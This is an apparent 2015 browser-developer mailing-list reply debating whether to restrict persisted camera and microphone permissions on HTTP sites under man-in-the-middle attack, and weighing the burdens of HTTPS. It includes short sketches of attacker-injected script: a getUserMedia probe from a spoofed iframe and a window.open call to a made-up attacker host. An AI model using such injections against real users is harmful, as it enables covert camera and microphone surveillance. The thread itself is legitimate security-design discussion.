On Tue, Mar 10, 2015 at 5:00 PM, Boris Zbarsky <bzba...@mit.edu> wrote:
> The mitigation applies in this situation:
>
> 1) User connects to a MITMed network (e.g. wireless at the airport or
> coffeeshop or whatever) which I will henceforth call "the attacker".
> 2) No matter what site the user loads, the attacker injects a hidden
> iframe claiming to be from hostname X that the user has granted a
> persistent permissions grant to.
> 3) The attacker now turns on the camera/microphone/whatever.
Aha, that makes a lot more sense. Thanks. Yes, that does seem like a
more realistic attack. A few points come to mind:
1) The page has no way to know whether it has persisted permissions
without just trying, right? If so, the user will notice something is
weird when he gets strange permissions requests, which makes the
attack less attractive. (There's a rough sketch of what that probe
looks like after this list.)
2) If the only common real-world MITM threat is via a compromise
adjacent to the client (e.g., wireless), there's no reason to restrict
geolocation, because the attacker already knows the user's location
fairly precisely.
3) Is there any reason to not persist permissions for as long as the
user remains on the same network (assuming we can figure that out
reliably)? If not, the proposal would be much less annoying, because
in many common cases the permission would be persisted for a long time
anyway. Better yet, can we ask the OS whether the network is
classified as home/work/public and only restrict the persistence for
public networks?
4) Feasible though the attack may be, I'm not sure how likely
attackers are to try it. Is there some plausible profit motive here?
Script kiddies will set up websites and portscan with botnets just for
lulz, but a malicious wireless router requires physical presence,
which is much riskier for the attacker. If I compromised a public
wireless router, I would try passively sniffing for credit card info
in people's unencrypted webmail, or steal their login info. Why would
I blow my cover by trying to take pictures of them?
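To make point 1 concrete, here's roughly what the injected frame's
probe would look like (entirely my own sketch, TypeScript-ish browser
script; none of it comes from the proposal itself):

    // Runs inside the attacker's injected iframe claiming to be hostname X.
    // If the user has a persisted grant for X's origin, this resolves
    // silently; otherwise the browser has to prompt (or reject), which is
    // exactly the "something is weird" signal from point 1.
    navigator.mediaDevices.getUserMedia({ video: true, audio: true })
      .then((stream: MediaStream) => {
        // persisted grant: live camera/mic stream, ship it off somewhere
      })
      .catch(() => {
        // no persisted grant: the probe was visible, or it failed outright
      });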
> Right, and only work if the user loads such a site themselves on that
> network. If I load cnn.com and get a popup asking whether Google Hangouts
> can turn on my camera, I'd get a bit suspicious... (though I bet a lot of
> people would just click through anyway).
Especially because it says Google Hangouts wants the permission. Why
wouldn't I give permission to Google Hangouts, if I use it regularly?
Maybe it's a bit puzzling that it's asking me right now, but computers
are weird, it probably has some reason. If it was some site I didn't
recognize I might say no, but not if it's a site I use all the time.
I'm not convinced that the proposal increases real-world security
enough to warrant any reduction at all in user convenience.
>> "Switch to HTTPS" is not a reasonable solution.
>
>
> Why not?
Because unless things have changed a lot in the last three years or
so, HTTPS is a pain for a few reasons:
1) It requires time and effort to set up. Network admins have better
things to do. Many of them are volunteers, work part-time, have
computers as only a small part of their job, or are simply
overworked.
2) It adds an additional point of failure. It's easy to misconfigure,
and you have to keep the certificate up-to-date. If you mess up,
browsers will helpfully go berserk and tell your users that your site
is trying to hack their computer (or that's what users will infer from
the terrifying bright-red warnings). This is not a simple problem to
solve -- for a long time, https://amazon.com would give a cert error,
I'm pretty sure I once saw an error on a Google property, and I think
Microsoft had one at some point too. (A sketch of the sort of expiry
monitoring this pushes you into follows this list.)
3) Last I checked, if you want a cert that works in all browsers, you
need to pay money. This is a big psychological hurdle for some
people, and may be unreasonable for people who manage a lot of small
domains.
4) It adds round-trips, which is a big deal for people on high-latency
connections. I remember Google was trying to cut it down to one extra
round-trip on the first connection and none on subsequent connections,
but I don't know if that's actually made it into all the major
browsers yet.
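For what it's worth, the "keep the certificate up-to-date" part of
point 2 usually ends up meaning every admin writes some variant of
the same watchdog. A minimal sketch (Node-style TypeScript; the
hostname is a placeholder):

    import * as tls from "tls";

    // Warn when a site's certificate is close to expiring, before
    // browsers start showing users the scary interstitial.
    const host = "example.com"; // placeholder
    const socket = tls.connect({ host, port: 443, servername: host }, () => {
      const cert = socket.getPeerCertificate();
      // valid_to is a date string like "Dec 31 23:59:59 2016 GMT"
      const daysLeft =
        (new Date(cert.valid_to).getTime() - Date.now()) / 86400000;
      if (daysLeft < 14) {
        console.warn(`cert for ${host} expires in ${daysLeft.toFixed(1)} days`);
      }
      socket.end();
    });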
These issues all seem basically fixable within a few years, if the
major stakeholders got on board. But until they're fixed, there are
good reasons for sysadmins to be reluctant to use SSL. Ideally,
setting up SSL would look something like this: the webserver
automatically generates a key pair, submits the public key to its
nameserver to be put into its domain's DNSSEC CERT record, queries the
resulting DNSSEC record, and serves it to browsers as its certificate;
and of course automatically re-queries the record periodically so it
doesn't expire. The nameserver can verify the server's IP address
matches the A record to ensure that it's the right one, unless
someone has compromised the backbone or the nameserver's local
network. In theory you don't need DNSSEC; CACert or whatever would
work too. You would still need SNI in a lot of cases.
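To make the key-to-DNS step concrete, here's roughly what the record
the webserver publishes could look like (my illustration only: I've
used the DANE TLSA format rather than a CERT record, it's Node-style
TypeScript, and the actual submission to the nameserver is omitted):

    import { createHash, generateKeyPairSync } from "crypto";

    // Generate the server's key pair and derive the DNS record that pins
    // its public key (TLSA 3 1 1: end-entity cert, match on the
    // SubjectPublicKeyInfo, SHA-256 digest).
    const { publicKey } = generateKeyPairSync("rsa", {
      modulusLength: 2048,
      publicKeyEncoding: { type: "spki", format: "der" },
      privateKeyEncoding: { type: "pkcs8", format: "pem" },
    });
    const digest = createHash("sha256").update(publicKey).digest("hex");
    // Placeholder domain; this line is what gets handed to the nameserver.
    console.log(`_443._tcp.example.com. IN TLSA 3 1 1 ${digest}`);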
Then it would be reasonable to push people to use HTTPS, at least as
an option for people with newer browsers that support the new features
required. An HTTP header telling supporting browsers to upgrade to
HTTPS might help here.
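The existing Strict-Transport-Security header is already in this
spirit -- browsers that understand it will stick to HTTPS for the
host -- though it's only honored once it arrives over HTTPS in the
first place. A minimal sketch of where it would go (Node-style
TypeScript; paths, hostname, and body are placeholders):

    import { readFileSync } from "fs";
    import * as https from "https";

    // Once the HTTPS side is up, this header tells supporting browsers
    // to keep using HTTPS for this host for the next year.
    https.createServer(
      {
        key: readFileSync("/etc/ssl/private/example.com.key"),
        cert: readFileSync("/etc/ssl/certs/example.com.pem"),
      },
      (req, res) => {
        res.setHeader("Strict-Transport-Security", "max-age=31536000");
        res.end("hello over HTTPS\n");
      }
    ).listen(443);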
On Thu, Mar 12, 2015 at 12:28 PM, Anne van Kesteren <ann...@annevk.nl> wrote:
> It does seem like there are some improvements we could make here. E.g.
> not allow an <iframe> to request certain permissions. Insofar we
> haven't already.
Does that really help? The attacker could just insert a script to
open a new tab in the background that loads its contents in 5 ms (they
come from the local network, after all) and then closes itself.
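Roughly something like this (hostname made up, and ignoring popup
blockers, which admittedly complicate it):

    // Injected by the attacker into whatever plain-HTTP page the victim
    // loads. grab.html is served from the attacker's box on the local
    // network, so it loads near-instantly, fires the camera/mic request
    // against the spoofed origin, and then calls window.close() on itself.
    window.open("http://site-x.example/grab.html");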